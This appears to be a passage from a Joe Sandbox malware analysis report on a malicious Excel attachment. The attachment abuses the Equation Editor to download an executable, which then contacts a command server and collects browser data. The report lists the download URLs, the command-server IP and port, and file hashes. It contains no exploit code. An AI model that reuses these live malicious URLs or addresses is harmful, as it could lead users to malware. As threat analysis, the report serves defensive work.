103.171.0.134/_spaceX2__/.win32.exe | true | Avira URL Cloud: malware | unknown
https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme | false | | high
olypath.com/RLBIl.exe | true | Avira URL Cloud: malware | unknown
179.43.175.99:21900/ | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name Source Malicious Antivirus Detection Reputation
https://duckduckgo.com/chrome_newtab vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
ns.adobe.c/s vbc.exe, 00000005.00000002.549398134.000000000500D000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
https://duckduckgo.com/ac/?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
ocsp.entrust.net03 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/EnvironmentSettings vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
179.43.175.99:21900x0 vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe low
https://api.ip.sb/geoip vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/soap/envelope/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false high
crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
www.diginotar.nl/cps/pkioverheid0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/VerifyUpdateResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/CheckConnectprH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: phishing unknown
tempuri.org/Endpoint/SetEnvironment vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/SetEnvironmentResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/GetUpdates vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547547882.0000000002381000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://api.ipify.orgcookies//settinString.Removeg vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
true URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2004/08/addressing/faultvbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
179.43.175.99:21900 vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
tempuri.org/Endpoint/VerifyUpdate vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
tempuri.org/Endpoint/SetEnvironmenteMH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
true Avira URL Cloud: phishing unknown
ocsp.entrust.net0D vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2005/05/identity/claims/name
vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
https://ipinfo.io/ip%appdata% vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
false high
crl.entrust.net/server1.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false high
schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
tempuri.org/Endpoint/CheckConnectResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.datacontract.org/2004/07/ vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
https://cdn.discordapp.com vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
https://api.ip.sbP vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp
false Avira URL Cloud: safe unknown
https://www.google.com/favicon.ico tmp72BF.tmp.5.dr false high
https://ac.ecosia.org/autocomplete?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr
false high
crl.pkioverheid.nl/DomOvLatestCRL.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
false URL Reputation: safe unknown
schemas.xmlsoap.org/ws/2004/08/addressing vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
tempuri.org/Endpoint/GetUpdatesResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false URL Reputation: safe unknown
https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-io
vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp
false high
tempuri.org/Endpoint/EnvironmentSettingsResponse | vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
ns.adobe. | vbc.exe, 00000005.00000002.547155081.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify. | vbc.exe | true | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr | false | | high
olypath.comP | vbc.exe, 00000004.00000002.498573662.0000000002350000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
tempuri.org/h | vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
crl.entrust.net/2048ca.crl0 | vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.ipify.orgcoo | vbc.exe | true | Avira URL Cloud: safe | unknown
schemas.xmlsoap.org/soap/actor/next | vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr | false | | high
World Map of Contacted IPs
[Map figure; legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]
Public IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
162.159.130.233 | cdn.discordapp.com | United States | | 13335 | CLOUDFLARENETUS | false
178.18.193.160 | olypath.com | Turkey | | 50941 | VARGONENTR | false
179.43.175.99 | unknown | Panama | | 51852 | PLI-ASCH | true
103.171.0.134 | unknown | unknown | | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
General Information
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 576509
Start date: 22.02.2022
Start time: 15:29:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: POAT2076452.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@6/46@4/4
EGA Information: Successful, ratio: 100%
HDC Information: Successful, ratio: 1.6% (good quality ratio 1.4%); Quality average: 61.5%; Quality standard deviation: 25.1%
HCA Information: Successful, ratio: 98%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .xlsx; Found Word or Excel or PowerPoint or XPS Viewer; Attach to Office via COM; Scroll down; Close Viewer
Warnings
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
Not all processes were analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: POAT2076452.xlsx
Simulations
Behavior and APIs
Time | Type | Description
15:29:48 | API Interceptor | 55x Sleep call for process: EQNEDT32.EXE modified
15:29:51 | API Interceptor | 273x Sleep call for process: vbc.exe modified
Joe Sandbox View / Context
IPs
⊘ No context
Domains
⊘ No context
ASNs
⊘ No context
JA3 Fingerprints
⊘ No context
Dropped Files
⊘ No context
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 14336
Entropy (8bit): 5.171700803602097
Encrypted: false
SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ
MD5: 980EC4304344F277D722024ADE08CD01
SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5
SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105
SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68
Malicious: true
Antivirus: Joe Sandbox ML, Detection: 100%; ReversingLabs, Detection: 7%
Reputation: low
IE Cache URL: 103.171.0.134/_spaceX2__/.win32.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 10202
Entropy (8bit): 7.870143202588524
Encrypted: false
SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5: 66EF10508ED9AE9871D59F267FBE15AA
SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 10202
Entropy (8bit): 7.870143202588524
Encrypted: false
SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5: 66EF10508ED9AE9871D59F267FBE15AA
SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 3747
Entropy (8bit): 7.932023348968795
Encrypted: false
SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
MD5: 5EB99F38CB355D8DAD5E791E2A0C9922
SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 11303
Entropy (8bit): 7.909402464702408
Encrypted: false
SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 5396
Entropy (8bit): 7.915293088075047
Encrypted: false
SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1: 556C229F539D60F1FF434103EC1695C7554EB720
SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 3747
Entropy (8bit): 7.932023348968795
Encrypted: false
SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
MD5: 5EB99F38CB355D8DAD5E791E2A0C9922
SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1099960
Entropy (8bit): 2.0153141692634335
Encrypted: false
SSDEEP: 3072:nXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:tahIFdyiaT2qtXl
MD5: 8933AD2DEA3390B99DDB8AB58199F107
SHA1: 0B63D26D4874E10E225810BAD34C61E81F4295C0
SHA-256: 38209C7C7C296B024FB42ECAB403D1835E7F193F27D82D14EA38FE94505F0F76
SHA-512: 214434AB87550A250F1F3E201C07FC993D204DCDC88C6B4CAE5EFA495541FC5CA999F0ED835E79E3965AB5DCB166D3B6065F167658069F4B5E4F9F2F56FDB7A7
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 5396
Entropy (8bit): 7.915293088075047
Encrypted: false
SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1: 556C229F539D60F1FF434103EC1695C7554EB720
SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
Category: dropped
Size (bytes): 4396
Entropy (8bit): 7.884233298494423
Encrypted: false
SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5: 22FEC44258BA0E3A910FC2A009CEE2AB
SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 2647
Entropy (8bit): 7.8900124483490135
Encrypted: false
SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5: E46357D82EBC866EEBDA98FA8F94B385
SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
Category: dropped
Size (bytes): 4396
Entropy (8bit): 7.884233298494423
Encrypted: false
SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5: 22FEC44258BA0E3A910FC2A009CEE2AB
SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
